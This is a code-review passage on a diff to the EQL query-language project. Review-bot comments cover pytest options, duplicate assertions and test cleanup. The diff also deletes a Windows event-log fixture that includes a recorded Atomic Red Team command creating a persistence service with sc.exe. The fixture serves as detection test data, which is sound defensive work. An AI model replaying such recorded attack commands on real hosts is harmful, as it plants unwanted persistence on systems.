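Review bot: With the new `user_options = [("pytest-args=", "a", ...)]`, a value given on the command line reaches `run_tests` as a single string, but the default set in `initialize_options` is the list `[]`, and `pytest.main(self.pytest_args)` receives either form unchanged; the removed `finalize_options` is where that coercion belongs. Restoring `finalize_options` with a `shlex.split` on string input (shlex needs importing at the top of setup.py) keeps both forms working.
```python
    def finalize_options(self):
        """Split a pytest-args string given on the command line into a list."""
        TestCommand.finalize_options(self)
        if isinstance(self.pytest_args, str):
            self.pytest_args = shlex.split(self.pytest_args)

    # … unchanged: run_tests …
```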
@@ -88,16 +102,30 @@ def run_tests(self): 'console_scripts': [ 'eql=eql.main:main', ], + 'pygments.lexers': [ + 'eql=eql.highlighters:EqlLexer' + ] }, extras_require={ + 'docs': [ + 'sphinx', + 'sphinx_rtd_theme', + ], + 'cli': [ + 'pygments', + 'prompt_toolkit', + ], 'lint': test_requires, 'test': test_requires, 'loaders': [ 'pyyaml', 'toml', + ], + 'highlighters': [ + 'pygments', ] }, - packages=find_packages(), + packages=['eql', 'eql.tests', 'eql.etc'], package_data={ 'eql': etc_files, }, diff --git a/tests/test_ast.py b/tests/test_ast.py new file mode 100644 index 0000000..0c818b9 --- /dev/null +++ b/tests/test_ast.py 
@@ -0,0 +1,95 @@
+"""Test case."""
+import unittest
+
+from eql.ast import *  # noqa: F403
+from eql.pipes import *  # noqa: F403
+from eql.parser import (
+    parse_expression
+)
+from eql.walkers import Walker, RecursiveWalker
+
+
+class TestAbstractSyntaxTree(unittest.TestCase):
+    """Test EQL parsing."""
+
+    def test_abstract_methods(self):
+        """Test that abstract methods are raising exceptions."""
+        node = EqlNode()
+        self.assertRaises(NotImplementedError, node.render)
+
+        macro = BaseMacro("name")
+        self.assertRaises(NotImplementedError, macro.expand, [])
+
+    def test_invalid_ast(self):
+        """Test that invalid ast nodes raise errors."""
+        self.assertRaises(TypeError, Literal, True)
+        self.assertRaises(TypeError, Literal, dict())
+        self.assertRaises(TypeError, Literal, list())
+        self.assertRaises(TypeError, Literal, complex())
+        self.assertRaises(TypeError, Literal, object())
+        self.assertRaises(TypeError, Literal, lambda: None)
+        self.assertRaises(TypeError, Literal, object)
+
+    def test_literals(self):
+        """Test that literals are parsed correctly."""
+        eql_literals = [
+            ('true', True, Boolean),
+            ('false', False, Boolean),
+            ('100', 100, Number),
+            ('1.5', 1.5, Number),
+            ('.6', .6, Number),
+            ('-100', -100, Number),
+            ('-15.24', -15.24, Number),
+            ('"100"', "100", String),
+            ('null', None, Null),
+        ]
+        for text, expected_value, expected_type in eql_literals:
+            node = parse_expression(text)
+            rendered = node.render()
+            re_parsed = parse_expression(rendered)
+            self.assertIsInstance(node, expected_type)
+            self.assertEqual(node.value, expected_value)
+            self.assertEqual(node, re_parsed)
+
+    def test_camelized(self):
+        """Test camelization of class names."""
+        camelized = Walker.camelized
+        self.assertEqual(camelized(String), "string")
+        self.assertEqual(camelized(EventQuery), "event_query")
+        self.assertEqual(camelized(EventQuery), "event_query")
+        self.assertEqual(camelized(EventQuery), "event_query")
+        self.assertEqual(camelized(FunctionCall), "function_call")
+        self.assertEqual(camelized(PipeCommand), "pipe_command")
+        self.assertEqual(camelized(UniqueCountPipe), "unique_count_pipe")
+
+    def test_walker(self):
+        """Check that walker transformation works properly."""
+        walker = RecursiveWalker()
+        node = parse_expression("process_name == 'net.exe' or file_name == 'abc.txt'")
+
+        def assert_deep_copy(a, b):
+            """Check that deep copies are created."""
+            self.assertEqual(a, b)
+            self.assertIsNot(a, b)
+
+            for deep_a, deep_b in zip(a, b):
+                self.assertEqual(deep_a, deep_b)
+                self.assertIsNot(deep_a, deep_b)
+
+        assert_deep_copy(node, walker.copy_node(node))
+
+        class SimpleWalker(RecursiveWalker):
+
+            def _walk_comparison(self, node):
+                if node.left == Field('file_name'):
+                    return self.walk(parse_expression('user_name == "TEMP_USER"'))
+                return self._walk_base_node(node)
+
+            def _walk_string(self, node):
+                if node == String("TEMP_USER"):
+                    return String("artemis")
+                return node
+
+        walker = SimpleWalker()
+        expected = parse_expression('process_name == "net.exe" or user_name == "artemis"')
+        self.assertEqual(walker.walk(node), expected)
diff --git a/tests/test_cli.py b/tests/test_cli.py
index 3a83da9..2cf1a3e 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -3,17 +3,18 @@
 import json
 import os
 import uuid
+import unittest
 
 import mock
 
-from .base import TestEngine
-from eql.errors import SchemaError
+from eql.errors import EqlSchemaError
 from eql.loader import save_analytics
-from eql.main import main
+from eql.main import main, BANNER, shell_main
 from eql.parser import parse_analytics
-from eql.schema import use_schema
-from eql.utils import save_dump
-
+from eql.schema import Schema
+from eql.tests import TestEngine, EVENTS_FILE
+from eql.table import Table
+from eql.utils import save_dump, to_unicode
 
 build_analytics = parse_analytics([
     {'query': "process where a == b", 'metadata': {'id': str(uuid.uuid4())}},
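Review bot: `test_camelized` asserts `camelized(EventQuery) == "event_query"` three times in a row; the repeats add no coverage and read like a copy-paste where other node classes were meant to go, so either drop two of them or substitute classes whose names exercise different camel-case shapes (a single-word class and a three-word one, say). The `from eql.ast import *` / `from eql.pipes import *` lines with `# noqa: F403` also hide which names this module depends on and disable the undefined-name check for every identifier below; importing the classes actually used (`EqlNode`, `BaseMacro`, `Literal`, `Boolean`, `Number`, `String`, `Null`, `Field`, `EventQuery`, `FunctionCall`, `PipeCommand`, `UniqueCountPipe`) explicitly keeps flake8 useful and documents the surface under test. Whether `UniqueCountPipe` is exported by `eql.ast` or `eql.pipes` cannot be confirmed from this hunk.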
@@ -27,7 +28,7 @@ def stdin_patch():
     return io.StringIO(u'\n'.join([json.dumps(event.data) for event in TestEngine.get_events()]))
 
 
-class TestEqlCommand(TestEngine):
+class TestEqlCommand(unittest.TestCase):
     """Test EQL command line parsing and functionality."""
 
     @mock.patch('sys.stdout')
@@ -46,48 +47,46 @@ def test_incomplete_args(self, mock_stdout, mock_stderr): @mock.patch('argparse.ArgumentParser.error') def test_engine_config(self, mock_error): """Test building an engine with a custom config.""" - schema = {'event_types': {'magic': 543212345}} + schema = {'magic': {"expected_field": "string"}} target_file = os.path.abspath('analytics-saved.tmp.json') analytics_file = os.path.abspath('analytics.tmp.json') config_file = os.path.abspath('config.tmp.json') - with use_schema(schema): - analytics = parse_analytics([{'query': "magic where true", 'metadata': {'id': str(uuid.uuid4())}}]) - save_analytics(analytics, analytics_file) - with open(analytics_file, 'r') as f: - expected_contents = f.read() - - save_dump({'schema': schema}, config_file) + if os.path.exists(target_file): + os.remove(target_file) - main(['build', analytics_file, target_file, '--config', config_file, '--analytics-only']) + analytics = parse_analytics([ + {'query': "magic where actual_field = true", 'metadata': {'id': str(uuid.uuid4())}}, + ]) + save_analytics(analytics, analytics_file) + save_dump({'schema': {"events": schema}, "allow_any": False}, config_file) - with open(target_file, 'r') as f: - actual_contents = f.read() + with self.assertRaises(EqlSchemaError): + main(['build', analytics_file, target_file, '--config', config_file, '--analytics-only']) - self.assertEqual(actual_contents, expected_contents) + self.assertFalse(os.path.exists(target_file)) os.remove(config_file) - os.remove(target_file) os.remove(analytics_file) - def test_engine_schema_failure(self): + def test_engine_schema_implied(self): """Test building an engine with a custom config.""" - schema = {'event_types': {'magic': 543212345}} + schema = {'magic': {}} target_file = os.path.abspath('analytics-saved.tmp.json') analytics_file = os.path.abspath('analytics.tmp.json') - with use_schema(schema): + with Schema(schema): analytics = parse_analytics([{'query': "magic where true", 'metadata': {'id': 
str(uuid.uuid4())}}]) save_analytics(analytics, analytics_file) - with self.assertRaises(SchemaError): - main(['build', analytics_file, target_file]) + main(['build', analytics_file, target_file]) os.remove(analytics_file) + os.remove(target_file) - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_query_eql_stdin(self, mock_print_event): """Stream stdin to the EQL command.""" @@ -98,7 +97,7 @@ def test_query_eql_stdin(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_implied_any(self, mock_print_event): """Stream stdin to the EQL command.""" @@ -109,7 +108,7 @@ def test_implied_any(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') @mock.patch('sys.stdin', new=stdin_patch()) def test_implied_base(self, mock_print_event): """Stream stdin to the EQL command.""" 
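Review bot: The temporary files written by `test_engine_config` (`analytics.tmp.json`, `config.tmp.json` in the current working directory) are removed only on the success path; if the `assertRaises(EqlSchemaError)` block fails, or `parse_analytics`/`save_dump` raises something unexpected, the trailing `os.remove` calls never run and the files are left behind for later runs. Register cleanup as soon as each file exists — `self.addCleanup(os.remove, analytics_file)` right after `save_analytics(...)` and `self.addCleanup(os.remove, config_file)` after `save_dump(...)` — and drop the trailing removes; `test_engine_schema_implied` has the same shape, and its new `os.remove(target_file)` additionally assumes `main` succeeded, so guard it with `os.path.exists` or a cleanup hook. `test_engine_schema_implied` also inherits the docstring "Test building an engine with a custom config." from the test it replaces even though it passes no config; something like "Test that an analytic builds when the event type is implied by the active schema." would describe what it now checks. The `@mock.patch('eql.PythonEngine.print_event')` path renames in the two following hunks need no further change.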
@@ -120,22 +119,56 @@ def test_implied_base(self, mock_print_event): actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') def test_query_eql_json(self, mock_print_event): """Test file I/O with EQL.""" query = "process where true | head 8 | tail 1" - main(['query', query, '-f', self.EVENTS_FILE]) + main(['query', query, '-f', TestEngine.events_file]) expected = [8] actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") - @mock.patch('eql.engines.native.PythonEngine.print_event') + @mock.patch('eql.PythonEngine.print_event') def test_query_eql_jsonl(self, mock_print_event): """Test file I/O with EQL.""" query = "process where true | head 8 | tail 1" - main(['query', query, '-f', self.EVENTS_FILE]) + main(['query', query, '-f', TestEngine.events_file]) expected = [8] actual_event_ids = [args[0][0].data['serial_event_id'] for args in mock_print_event.call_args_list] self.assertEqual(expected, actual_event_ids, "Event IDs didn't match expected.") + + # TODO: Fix this test so it actually works + def _test_interactive_shell(self): + """Test that commands can be executed via the interactive shell.""" + class Arguments(object): + config = None + file = None + + actual_stdin = io.StringIO(to_unicode("\n".join([ + "input %s" % EVENTS_FILE, + "table process_path parent_process_path", + "search\nprocess where serial_event_id in (32, 33);", + ]))) + + expected_stdout_text = "\n".join([ + BANNER, + "eql> input %s" % EVENTS_FILE, + "Using file %s with %d events" % (EVENTS_FILE, len(TestEngine.get_events())), + "eql> table process_path parent_process_path", + "eql> search process where serial_event_id in (32, 33)", + Table([ + 
["C:\\Windows\\System32\\sppsvc.exe", "C:\\Windows\\System32\\services.exe"], + ["C:\\Windows\\System32\\dwm.exe", "C:\\Windows\\System32\\svchost.exe"] + ], names=["process_path", "parent_process_path"]).__unicode__() + ]) + + actual_stdout = [] + + # Now actually run with redirected stdout and stdin + with mock.patch('sys.stdin', new=actual_stdin): + shell_main(Arguments()) + + actual_stdout_lines = "\n".join(actual_stdout).splitlines() + self.assertListEqual(actual_stdout_lines, expected_stdout_text.splitlines()) diff --git a/tests/test_data.json b/tests/test_data.json deleted file mode 100644 index 71fa9ea..0000000 --- a/tests/test_data.json +++ /dev/null 
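Review bot: `_test_interactive_shell` never captures anything into `actual_stdout`: only `sys.stdin` is patched, so `actual_stdout_lines` is always `[]` and the closing `assertListEqual` can never pass, which is presumably why the method is hidden behind a leading underscore and a TODO. Capturing output is a small change — `with mock.patch('sys.stdin', new=actual_stdin), mock.patch('sys.stdout', new_callable=io.StringIO) as fake_stdout:` around `shell_main(Arguments())`, then `actual_stdout_lines = fake_stdout.getvalue().splitlines()` — after which the unused `actual_stdout = []` can go. Whether the shell echoes the prompt and commands exactly as `expected_stdout_text` assumes (for example `"eql> search process where ..."` on one line for a `search\nprocess where ...` input) cannot be confirmed from this hunk, so the expectation may still need adjusting once real output is compared. If the test has to stay disabled for now, `@unittest.skip("...")` with the reason keeps it visible in the test report instead of silently excluded.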
@@ -1,159600 +0,0 @@ -[ - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", - "registry_value": "W32:0000000000050566", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883570659490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570670110000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570670270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883570685280000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - 
"process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883570685430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", - "registry_value": "W32:0000000000080582", - "timestamp": 131883570686060016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883570686060016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 1500, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "terminate", - "timestamp": 131883570696220000, - "unique_pid": "{42FC7E13-C965-5C05-0000-001028424901}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", 
- "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": 
"svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570715590000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1480, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570844660000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1480, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570844650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8148, - "ppid": 1480, - "process_name": "sc.exe", - "process_path": "C:\\Windows\\System32\\sc.exe", - "subtype": "create", - "timestamp": 131883570844800000, - "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}", - "unique_ppid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570844810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
